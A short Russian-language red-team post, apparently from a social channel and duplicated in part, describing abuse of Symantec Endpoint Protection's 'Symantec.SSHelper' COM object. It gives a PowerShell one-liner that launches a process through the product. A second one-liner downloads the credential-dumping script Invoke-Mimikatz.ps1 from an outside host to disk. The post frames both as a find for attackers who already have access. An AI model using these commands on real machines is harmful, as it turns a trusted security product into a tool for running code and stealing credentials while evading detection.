📮 Выполнение кода с помощью Symantec SEP
Symantec Endpoint Protection (SEP) — это программное обеспечение, для защиты конечных точек ИТ-инфраструктуры компаний. Symantec Endpoint Protection защищает ноутбуки, настольные компьютеры и серверы в вашей сети от вредоносных программ, угроз и уязвимостей. Широко используется в корпоративном секторе.
Однако, и тут нашлись слабые места. Например, если вы получили доступ к компьютеру с установленным Symantec SEP, вы можете использовать COM-объект Symantec.SSHelper для запуска процессов и загрузки произвольных файлов (см. скрины ниже). Отличная находка для Red Team.
Выполнение команды:
#redteam
Symantec Endpoint Protection (SEP) — это программное обеспечение, для защиты конечных точек ИТ-инфраструктуры компаний. Symantec Endpoint Protection защищает ноутбуки, настольные компьютеры и серверы в вашей сети от вредоносных программ, угроз и уязвимостей. Широко используется в корпоративном секторе.
Однако, и тут нашлись слабые места. Например, если вы получили доступ к компьютеру с установленным Symantec SEP, вы можете использовать COM-объект Symantec.SSHelper для запуска процессов и загрузки произвольных файлов (см. скрины ниже). Отличная находка для Red Team.
Выполнение команды:
$(New-Object -com "Symantec.SSHelper").RunEx(0,"calc","",$True,0,$True,$True);
Загрузка файла:
$(New-Object -com "Symantec.SSHelper").HIDownloadURLFile(0, "https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1","C:\TEMP\IM.ps1","","",0, $True,$False,$False,"","",0)
#redteam